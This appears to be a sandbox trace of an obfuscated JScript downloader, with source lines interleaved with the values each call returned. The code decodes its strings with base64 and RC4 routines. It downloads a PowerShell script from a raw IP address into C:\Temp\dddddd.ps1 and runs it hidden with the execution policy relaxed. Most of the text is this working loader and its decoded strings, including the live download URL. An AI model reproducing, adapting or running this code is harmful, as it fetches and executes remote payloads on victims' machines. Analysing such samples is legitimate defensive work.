                                                                                                                                                                                                          • _0x3d8f() ➔ bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0
                                                                                                                                                                                                          • _0x3d8f() ➔ W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG
                                                                                                                                                                                                          • _0x3d8f() ➔ message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4
                                                                                                                                                                                                          • _0x3d8f() ➔ message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4
                                                                                                                                                                                                          89
                                                                                                                                                                                                          return _0x5598 =
                                                                                                                                                                                                            90
                                                                                                                                                                                                            function (_0xe32f90, _0x265890) {
                                                                                                                                                                                                            • _0x5598(278,"E3DQ") ➔ "\xd4\x1a\x98\xec\xb8I,\x03EQL\xd4\x17"
                                                                                                                                                                                                            • _0x5598(304,"[aOH") ➔ undefined
                                                                                                                                                                                                            • _0x5598(278,"E3DQ") ➔ undefined
                                                                                                                                                                                                            • _0x5598(278,"E3DQ") ➔ undefined
                                                                                                                                                                                                            • _0x5598(278,"E3DQ") ➔ undefined
                                                                                                                                                                                                            • _0x5598(278,"E3DQ") ➔ "PX<B\xdd\x11\xdeL\xe7y\xa2\x01|P>%\xbe\x92\xe1\xac\xbf\xd5\x83\xa9ZUC L\x1a\xd7)N_A-\x8a"
                                                                                                                                                                                                            • _0x5598(304,"[aOH") ➔ undefined
                                                                                                                                                                                                            • _0x5598(278,"E3DQ") ➔ undefined
                                                                                                                                                                                                            • _0x5598(278,"E3DQ") ➔ "\xb8\xc6N\x937\x07\xa6\xa3\x0c\xb5"
                                                                                                                                                                                                            • _0x5598(304,"[aOH") ➔ "\xc3\xba\x02\xa7\xcc\x8a\xc6f>\xb1\xd0\x97N\xcd"
                                                                                                                                                                                                            91
                                                                                                                                                                                                            _0xe32f90 = _0xe32f90 - 0x111;
                                                                                                                                                                                                              92
                                                                                                                                                                                                              var _0xd04222 = _0x3d8f07[_0xe32f90];
                                                                                                                                                                                                                93
                                                                                                                                                                                                                if ( _0x5598['oGawjd'] === undefined )
                                                                                                                                                                                                                  94
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                    95
                                                                                                                                                                                                                    var _0x1d860e = function (_0x51df1d) {
                                                                                                                                                                                                                    • _0x1d860e("W4iJW43dGGa8W5i7W40iWOVcRq4") ➔ "\xc2#\xcd\xc2\x00<\xd2;\xcd\x08\x8b\xad\x0e"
                                                                                                                                                                                                                    • _0x1d860e("Run") ➔ undefined
                                                                                                                                                                                                                    • _0x1d860e("message") ➔ undefined
                                                                                                                                                                                                                    • _0x1d860e("12642224tnuDGo") ➔ undefined
                                                                                                                                                                                                                    • _0x1d860e("Quit") ➔ undefined
                                                                                                                                                                                                                    • _0x1d860e("rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia") ➔ "Failed to execute PowerShell script: "
                                                                                                                                                                                                                    • _0x1d860e("C:\Temp\dddddd.ps1") ➔ undefined
                                                                                                                                                                                                                    • _0x1d860e("124678FeSFCc") ➔ undefined
                                                                                                                                                                                                                    • _0x1d860e("WQ7dVXVcVCkpCLJcM8keW6W") ➔ "\xae\xff\x1b\xbd\x8frX\x9b\x84\xec"
                                                                                                                                                                                                                    • _0x1d860e("mti2ndiYmJr0BNver28") ➔ "12642224tnuDGo"
                                                                                                                                                                                                                    96
                                                                                                                                                                                                                    var _0x31b964 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
                                                                                                                                                                                                                      97
                                                                                                                                                                                                                      var _0x154394 = '', _0x203110 = '';
                                                                                                                                                                                                                        98
                                                                                                                                                                                                                        for ( var _0x1d9a6f = 0x0, _0x3ffedd, _0x2aa5db, _0x2f4f63 = 0x0 ; _0x2aa5db = _0x51df1d['charAt'] ( _0x2f4f63 ++ ) ; ~ _0x2aa5db && ( _0x3ffedd = _0x1d9a6f % 0x4 ? _0x3ffedd * 0x40 + _0x2aa5db : _0x2aa5db, _0x1d9a6f ++ % 0x4 ) ? _0x154394 += String['fromCharCode'] ( 0xff & _0x3ffedd >> ( - 0x2 * _0x1d9a6f & 0x6 ) ) : 0x0 )
                                                                                                                                                                                                                          99
                                                                                                                                                                                                                          {
                                                                                                                                                                                                                            100
                                                                                                                                                                                                                            _0x2aa5db = _0x31b964['indexOf'] ( _0x2aa5db );
                                                                                                                                                                                                                              101
                                                                                                                                                                                                                              }
                                                                                                                                                                                                                                102
                                                                                                                                                                                                                                for ( var _0x241040 = 0x0, _0x376734 = _0x154394['length'] ; _0x241040 < _0x376734 ; _0x241040 ++ )
                                                                                                                                                                                                                                  103
                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                    104
                                                                                                                                                                                                                                    _0x203110 += '%' + ( '00' + _0x154394['charCodeAt'] ( _0x241040 ) ['toString'] ( 0x10 ) )['slice'] ( - 0x2 );
                                                                                                                                                                                                                                      105
                                                                                                                                                                                                                                      }
                                                                                                                                                                                                                                        106
                                                                                                                                                                                                                                        return decodeURIComponent ( _0x203110 );
                                                                                                                                                                                                                                        • decodeURIComponent("%c3%82%23%c3%8d%c3%82%00%3c%c3%92%3b%c3%8d%08%c2%8b%c2%ad%0e") ➔ "\xc2#\xcd\xc2\x00<\xd2;\xcd\x08\x8b\xad\x0e"
                                                                                                                                                                                                                                        • decodeURIComponent("%ad%43") ➔ undefined
                                                                                                                                                                                                                                        • decodeURIComponent("%30%44%92%00%61") ➔ undefined
                                                                                                                                                                                                                                        • decodeURIComponent("%d7%6e%b8%db%6d%b8%4c%d5%1d%80") ➔ undefined
                                                                                                                                                                                                                                        • decodeURIComponent("%a9%42%13") ➔ undefined
                                                                                                                                                                                                                                        • decodeURIComponent("%46%61%69%6c%65%64%20%74%6f%20%65%78%65%63%75%74%65%20%50%6f%77%65%72%53%68%65%6c%6c%20%73%63%72%69%70%74%3a%20") ➔ "Failed to execute PowerShell script: "
                                                                                                                                                                                                                                        • decodeURIComponent("%72%d1%0c%3c%30%c3%0c%30%cf%4b") ➔ undefined
                                                                                                                                                                                                                                        • decodeURIComponent("%d7%6e%3a%ef%c7%c4%b1%f7%02") ➔ undefined
                                                                                                                                                                                                                                        • decodeURIComponent("%c2%ae%c3%bf%1b%c2%bd%c2%8f%72%58%c2%9b%c2%84%c3%ac") ➔ "\xae\xff\x1b\xbd\x8frX\x9b\x84\xec"
                                                                                                                                                                                                                                        • decodeURIComponent("%31%32%36%34%32%32%32%34%74%6e%75%44%47%6f") ➔ "12642224tnuDGo"
                                                                                                                                                                                                                                        107
                                                                                                                                                                                                                                        };
                                                                                                                                                                                                                                          108
                                                                                                                                                                                                                                          var _0x5598af = function (_0x203204, _0xf70333) {
                                                                                                                                                                                                                                          • function (_0xe32f90, _0x265890).cSinUy("W4iJW43dGGa8W5i7W40iWOVcRq4","E3DQ") ➔ "\xd4\x1a\x98\xec\xb8I,\x03EQL\xd4\x17"
                                                                                                                                                                                                                                          • function (_0xe32f90, _0x265890).cSinUy("Run","[aOH") ➔ undefined
                                                                                                                                                                                                                                          • function (_0xe32f90, _0x265890).cSinUy("message","E3DQ") ➔ undefined
                                                                                                                                                                                                                                          • function (_0xe32f90, _0x265890).cSinUy("12642224tnuDGo","E3DQ") ➔ undefined
                                                                                                                                                                                                                                          • function (_0xe32f90, _0x265890).cSinUy("Quit","E3DQ") ➔ undefined
                                                                                                                                                                                                                                          • function (_0xe32f90, _0x265890).cSinUy("rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia","E3DQ") ➔ "PX<B\xdd\x11\xdeL\xe7y\xa2\x01|P>%\xbe\x92\xe1\xac\xbf\xd5\x83\xa9ZUC L\x1a\xd7)N_A-\x8a"
                                                                                                                                                                                                                                          • function (_0xe32f90, _0x265890).cSinUy("C:\Temp\dddddd.ps1","[aOH") ➔ undefined
                                                                                                                                                                                                                                          • function (_0xe32f90, _0x265890).cSinUy("124678FeSFCc","E3DQ") ➔ undefined
                                                                                                                                                                                                                                          • function (_0xe32f90, _0x265890).cSinUy("WQ7dVXVcVCkpCLJcM8keW6W","E3DQ") ➔ "\xb8\xc6N\x937\x07\xa6\xa3\x0c\xb5"
                                                                                                                                                                                                                                          • function (_0xe32f90, _0x265890).cSinUy("mti2ndiYmJr0BNver28","[aOH") ➔ "\xc3\xba\x02\xa7\xcc\x8a\xc6f>\xb1\xd0\x97N\xcd"
                                                                                                                                                                                                                                          109
                                                                                                                                                                                                                                          var _0x23e053 = [], _0x26adf9 = 0x0, _0xa9f75e, _0x3564e4 = '';
                                                                                                                                                                                                                                            110
                                                                                                                                                                                                                                            _0x203204 = _0x1d860e ( _0x203204 );
                                                                                                                                                                                                                                            • _0x1d860e("W4iJW43dGGa8W5i7W40iWOVcRq4") ➔ "\xc2#\xcd\xc2\x00<\xd2;\xcd\x08\x8b\xad\x0e"
                                                                                                                                                                                                                                            • _0x1d860e("Run") ➔ undefined
                                                                                                                                                                                                                                            • _0x1d860e("message") ➔ undefined
                                                                                                                                                                                                                                            • _0x1d860e("12642224tnuDGo") ➔ undefined
                                                                                                                                                                                                                                            • _0x1d860e("Quit") ➔ undefined
                                                                                                                                                                                                                                            • _0x1d860e("rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia") ➔ "Failed to execute PowerShell script: "
                                                                                                                                                                                                                                            • _0x1d860e("C:\Temp\dddddd.ps1") ➔ undefined
                                                                                                                                                                                                                                            • _0x1d860e("124678FeSFCc") ➔ undefined
                                                                                                                                                                                                                                            • _0x1d860e("WQ7dVXVcVCkpCLJcM8keW6W") ➔ "\xae\xff\x1b\xbd\x8frX\x9b\x84\xec"
                                                                                                                                                                                                                                            • _0x1d860e("mti2ndiYmJr0BNver28") ➔ "12642224tnuDGo"
                                                                                                                                                                                                                                            111
                                                                                                                                                                                                                                            var _0x317ee2;
                                                                                                                                                                                                                                              112
                                                                                                                                                                                                                                              for ( _0x317ee2 = 0x0 ; _0x317ee2 < 0x100 ; _0x317ee2 ++ )
                                                                                                                                                                                                                                                113
                                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                                  114
                                                                                                                                                                                                                                                  _0x23e053[_0x317ee2] = _0x317ee2;
                                                                                                                                                                                                                                                    115
                                                                                                                                                                                                                                                    }
                                                                                                                                                                                                                                                      116
                                                                                                                                                                                                                                                      for ( _0x317ee2 = 0x0 ; _0x317ee2 < 0x100 ; _0x317ee2 ++ )
                                                                                                                                                                                                                                                        117
                                                                                                                                                                                                                                                        {
                                                                                                                                                                                                                                                          118
                                                                                                                                                                                                                                                          _0x26adf9 = ( _0x26adf9 + _0x23e053[_0x317ee2] + _0xf70333['charCodeAt'] ( _0x317ee2 % _0xf70333['length'] ) ) % 0x100, _0xa9f75e = _0x23e053[_0x317ee2], _0x23e053[_0x317ee2] = _0x23e053[_0x26adf9], _0x23e053[_0x26adf9] = _0xa9f75e;
                                                                                                                                                                                                                                                            119
                                                                                                                                                                                                                                                            }
                                                                                                                                                                                                                                                              120
                                                                                                                                                                                                                                                              _0x317ee2 = 0x0, _0x26adf9 = 0x0;
                                                                                                                                                                                                                                                                121
                                                                                                                                                                                                                                                                for ( var _0xee0fb4 = 0x0 ; _0xee0fb4 < _0x203204['length'] ; _0xee0fb4 ++ )
                                                                                                                                                                                                                                                                  122
                                                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                                                    123
                                                                                                                                                                                                                                                                    _0x317ee2 = ( _0x317ee2 + 0x1 ) % 0x100, _0x26adf9 = ( _0x26adf9 + _0x23e053[_0x317ee2] ) % 0x100, _0xa9f75e = _0x23e053[_0x317ee2], _0x23e053[_0x317ee2] = _0x23e053[_0x26adf9], _0x23e053[_0x26adf9] = _0xa9f75e, _0x3564e4 += String['fromCharCode'] ( _0x203204['charCodeAt'] ( _0xee0fb4 ) ^ _0x23e053[( _0x23e053[_0x317ee2] + _0x23e053[_0x26adf9] ) % 0x100] );
                                                                                                                                                                                                                                                                      124
                                                                                                                                                                                                                                                                      }
                                                                                                                                                                                                                                                                        125
                                                                                                                                                                                                                                                                        return _0x3564e4;
                                                                                                                                                                                                                                                                          126
                                                                                                                                                                                                                                                                          };
                                                                                                                                                                                                                                                                            127
                                                                                                                                                                                                                                                                            _0x5598['cSinUy'] = _0x5598af, _0x52b743 = arguments, _0x5598['oGawjd'] = ! ! [];
                                                                                                                                                                                                                                                                              128
                                                                                                                                                                                                                                                                              }
                                                                                                                                                                                                                                                                                129
                                                                                                                                                                                                                                                                                var _0x3cf29b = _0x3d8f07[0x0], _0x360a4b = _0xe32f90 + _0x3cf29b, _0x301f1f = _0x52b743[_0x360a4b];
                                                                                                                                                                                                                                                                                  130
                                                                                                                                                                                                                                                                                  return ! _0x301f1f ? ( _0x5598['yAOuWA'] === undefined && ( _0x5598['yAOuWA'] = ! ! [] ), _0xd04222 = _0x5598['cSinUy'] ( _0xd04222, _0x265890 ), _0x52b743[_0x360a4b] = _0xd04222 ) : _0xd04222 = _0x301f1f, _0xd04222;
                                                                                                                                                                                                                                                                                  • function (_0xe32f90, _0x265890).cSinUy("W4iJW43dGGa8W5i7W40iWOVcRq4","E3DQ") ➔ "\xd4\x1a\x98\xec\xb8I,\x03EQL\xd4\x17"
                                                                                                                                                                                                                                                                                  • function (_0xe32f90, _0x265890).cSinUy("Run","[aOH") ➔ undefined
                                                                                                                                                                                                                                                                                  • function (_0xe32f90, _0x265890).cSinUy("message","E3DQ") ➔ undefined
                                                                                                                                                                                                                                                                                  • function (_0xe32f90, _0x265890).cSinUy("12642224tnuDGo","E3DQ") ➔ undefined
                                                                                                                                                                                                                                                                                  • function (_0xe32f90, _0x265890).cSinUy("Quit","E3DQ") ➔ undefined
                                                                                                                                                                                                                                                                                  • function (_0xe32f90, _0x265890).cSinUy("rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia","E3DQ") ➔ "PX<B\xdd\x11\xdeL\xe7y\xa2\x01|P>%\xbe\x92\xe1\xac\xbf\xd5\x83\xa9ZUC L\x1a\xd7)N_A-\x8a"
                                                                                                                                                                                                                                                                                  • function (_0xe32f90, _0x265890).cSinUy("C:\Temp\dddddd.ps1","[aOH") ➔ undefined
                                                                                                                                                                                                                                                                                  • function (_0xe32f90, _0x265890).cSinUy("124678FeSFCc","E3DQ") ➔ undefined
                                                                                                                                                                                                                                                                                  • function (_0xe32f90, _0x265890).cSinUy("WQ7dVXVcVCkpCLJcM8keW6W","E3DQ") ➔ "\xb8\xc6N\x937\x07\xa6\xa3\x0c\xb5"
                                                                                                                                                                                                                                                                                  • function (_0xe32f90, _0x265890).cSinUy("mti2ndiYmJr0BNver28","[aOH") ➔ "\xc3\xba\x02\xa7\xcc\x8a\xc6f>\xb1\xd0\x97N\xcd"
                                                                                                                                                                                                                                                                                  131
                                                                                                                                                                                                                                                                                  }, _0x5598 ( _0x52b743, _0xdbcf57 );
                                                                                                                                                                                                                                                                                    132
                                                                                                                                                                                                                                                                                    }
                                                                                                                                                                                                                                                                                      133
                                                                                                                                                                                                                                                                                      function RunPowerShellScript(_0x3215af) {
                                                                                                                                                                                                                                                                                      • RunPowerShellScript("C:\Temp\dddddd.ps1") ➔ undefined
                                                                                                                                                                                                                                                                                      134
                                                                                                                                                                                                                                                                                      var _0x42f115 = _0x165511, _0xe1c1e0 = _0x429836;
                                                                                                                                                                                                                                                                                        135
                                                                                                                                                                                                                                                                                        try
                                                                                                                                                                                                                                                                                          136
                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                            137
                                                                                                                                                                                                                                                                                            var _0x1a1ae9 = POWERSHELL_CMD + '\x22' + _0x3215af + '\x22';
                                                                                                                                                                                                                                                                                              138
                                                                                                                                                                                                                                                                                              shell[_0xe1c1e0 ( 0x11d ) ] ( _0x1a1ae9, 0x0, ! ! [] );
                                                                                                                                                                                                                                                                                              • _0xe1c1e0(285) ➔ "Run"
                                                                                                                                                                                                                                                                                              • Run("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"",0,true) ➔ 0
                                                                                                                                                                                                                                                                                              139
                                                                                                                                                                                                                                                                                              }
                                                                                                                                                                                                                                                                                                140
                                                                                                                                                                                                                                                                                                catch ( _0x10f49e )
                                                                                                                                                                                                                                                                                                  141
                                                                                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                                                                                    142
                                                                                                                                                                                                                                                                                                    LogError ( _0x42f115 ( 0x12d ) + _0x10f49e[_0xe1c1e0 ( 0x12a ) ] );
                                                                                                                                                                                                                                                                                                      143
                                                                                                                                                                                                                                                                                                      }
                                                                                                                                                                                                                                                                                                        144
                                                                                                                                                                                                                                                                                                        }
                                                                                                                                                                                                                                                                                                          145
                                                                                                                                                                                                                                                                                                          DownloadScript ( URL, DownloadPath ) ? RunPowerShellScript ( DownloadPath ) : ( LogError ( _0x165511 ( 0x126 ) ), WScript[_0x429836 ( 0x12c ) ] ( ) );
                                                                                                                                                                                                                                                                                                          • DownloadScript("http://196.251.92.64/crypt/popo.ps1","C:\Temp\dddddd.ps1") ➔ true
                                                                                                                                                                                                                                                                                                          • RunPowerShellScript("C:\Temp\dddddd.ps1") ➔ undefined
                                                                                                                                                                                                                                                                                                          Reset < >